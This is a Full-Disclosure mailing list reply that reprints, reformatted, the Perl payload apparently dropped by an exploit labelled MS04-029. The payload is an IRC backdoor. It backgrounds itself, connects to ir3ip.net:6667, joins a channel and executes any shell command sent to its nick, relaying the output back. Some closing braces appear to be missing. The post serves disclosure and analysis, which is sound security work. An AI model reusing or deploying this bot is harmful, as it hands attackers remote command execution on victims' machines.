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Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)

Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.
$chan      = "#0x";
$nick      = "k";
$server    = "ir3ip.net";
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i = 1;

while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) {
    $mode = $1;
    last if $mode == "001";
    if ( $mode == "433" ) {
        $nick =~ s/\d*$/$i/;
        print $sock "NICK $nick\n";
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while (<$sock>) {
    if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; }
    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        $_ = `$_`;
        foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; }
}    #/tmp/hi/tmp/hi